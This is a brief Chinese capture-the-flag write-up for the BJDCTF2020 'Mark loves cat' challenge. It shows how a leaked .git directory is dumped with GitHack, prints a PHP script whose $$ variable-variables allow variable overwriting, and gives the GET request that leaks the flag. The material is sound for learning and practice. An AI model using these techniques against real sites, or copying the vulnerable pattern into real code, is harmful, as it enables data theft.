[BJDCTF2020]Mark loves cat [git泄露][变量覆盖漏洞]
扫出来/.git/
利用GitHack拿到index.php
源代码:
<?php
include 'flag.php';
//flag.php:
//<?php
//$flag = file_get_contents('/flag');
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;漏洞利用点:
GET提交的键值和键名都是可控的,存在 $$ 可以实现变量覆盖
$$x的意思就是把$x的值当作变量名再新创建一个变量,$$x=$$y的意思就是,比如说传进 ?name=test ,此时 $x=name,$y=test ,就会让$name=$text
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}我们可以利用变量覆盖构造GET请求handsome=flag,此时通过foreach就会变成$handsome=$flag,就会把flag的值赋给$handsome。再满足if条件就可以输出$handsome也即是flag值了
/?handsome=flag&flag=kkk&kkk=111得到flag
